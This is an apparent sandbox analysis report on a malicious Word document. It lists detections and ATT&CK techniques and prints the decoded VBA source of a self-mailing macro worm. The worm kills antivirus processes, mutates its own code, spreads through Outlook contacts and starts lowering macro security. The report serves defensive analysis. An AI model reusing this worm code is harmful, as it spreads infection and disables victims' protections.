MALICIOUS
380
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains a VBA macro with an auto-executing Document_Open subroutine. This macro uses CreateObject and Shell() calls, indicative of executing external code. It also attempts to disable antivirus processes by closing tasks with 'av' or 'AV' in their names. The macro's obfuscated nature and the presence of ClamAV detections for 'Win.Worm.Moffas-1' strongly suggest it's designed to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Win.Worm.Moffas-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Worm.Moffas-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6611 bytes |
SHA-256: f6ebe67192d4a30c8f926326e5a85eb54b4c5ee67355a4dd1cc8636c50be9898 |
|||
|
Detection
ClamAV:
Win.Worm.Moffas-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long
Sub Document_Open()
On Error Resume Next
'[die3.B] Virus by MI_pirat
'payload
nr = Day(Date)
If nr = 23 Then
MsgBox Chr(34) + Chr(100) + Chr(105) + Chr(101) + Chr(32) + Chr(100) + Chr(105) + Chr(101) + Chr(32) + _
Chr(100) + Chr(105) + Chr(101) + Chr(34) + Chr(32) + Chr(45) + Chr(91) + Chr(100) + Chr(105) + Chr(101) + _
Chr(51) + Chr(93) + Chr(45) + Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(77) + Chr(73) + Chr(95) + Chr(112) + _
Chr(105) + Chr(114) + Chr(97) + Chr(116), vbInformation, Chr(100) + Chr(105) + Chr(101) + Chr(51) + Chr(32) + _
Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", "Wallpaper") = "C:\Windows\setup.bmp"
ShowCursor 0
End If
'inchide antivir. daca e pornit
Set char1 = Tasks
For ik = 1 To char1.Count
If InStr(1, char1(ik).Name, "av", vbTextCompare) Or InStr(1, char1(ik).Name, "AV", vbTextCompare) Then
char1(ik).Close
End If
Next ik
'poly starts here:
Set char1 = ActiveDocument.VBProject
Set char2 = char1.VBComponents(1).CodeModule
If ThisDocument.FullName <> Templates(1).FullName Then
nr = 17
ReDim suk(1 To nr) As String
suk(1) = "nr": suk(2) = "bkup": suk(3) = "suk": suk(4) = "myRange"
suk(5) = "strip": suk(6) = "ik": suk(7) = "char1": suk(8) = "nam1"
suk(9) = "DOutlook": suk(10) = "DMapiName": suk(11) = "BreakUmOffAS"
suk(12) = "mmm": suk(13) = "xxx": suk(14) = "aa": suk(15) = "Pee": suk(16) = "ij": suk(17) = "char2"
'modif var.
For ik = 1 To nr
Randomize
strip = Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + "Mp"
For bkup = 2 To char2.CountOfLines
nam1 = char2.Lines(bkup, 1)
If InStr(1, nam1, suk(ik), vbTextCompare) Then
nam1 = Replace(nam1, suk(ik), strip, 1, -1, vbTextCompare)
char2.ReplaceLine bkup, nam1
End If
Next bkup
Next ik
'Adauga si ceva caractere aleatoare (ca sa fie si mai poly),dar nu prea multe
For ik = 2 To char2.CountOfLines
nam1 = char2.Lines(ik, 1)
If Len(nam1) <= 100 Then
nam1 = nam1 + "'" + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32))
char2.ReplaceLine ik, nam1
End If
Next ik
End If
'Virusul propriu-zis
'-------------------------------------------------------------------
'e-mail spread
Dim DOutlook, DMapiName, BreakUmOffAS
mmm = Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107)
Set DOutlook = CreateObject(mmm + ".Application")
Set DMapiName = DOutlook.GetNameSpace("MAPI")
If DOutlook = mmm Then
DMapiName.Logon "profile", "password"
Set mmm = DMapiName.AddressLists
For ik = 1 To mmm.Count
Set ABook = DMapiName.AddressLists(ik)
xxx = 1
Set aa = ABook.AddressEntries
Set BreakUmOffAS = DOutlook.CreateItem(0)
For ij = 1 To aa.Count
Pee = aa(xxx)
BreakUmOffAS.Recipients.Add Pee
xxx = xxx + 1
If xxx > 20 Then nr = aa.Count
Next ij
BreakUmOffAS.Subject = "hello!!!"
BreakUmOffAS.Body = "Cool jokes (more in the doc.) "
BreakUmOffAS.Attachments.Add ActiveDocument.FullName
BreakUmOffAS.Send
Pee = ""
Next ik
DMapiName.Logoff
End If
'verif. daca a infectat compu'
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "XP") <> "inXP" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "XP") = "inXP"
'securitate, ce securitate?! :D
Options.SaveNormalPrompt = 5 Xor 5
CommandBars(Chr(84) + Chr(111) + Chr(111) + Chr(108) + Chr(115)).Controls(Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111)).Enabled = (1 Xor 1)
Open "C:\a.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1, ""
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #1, """Level"" = dword:00000001"
Print #1, """AccessVBO
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.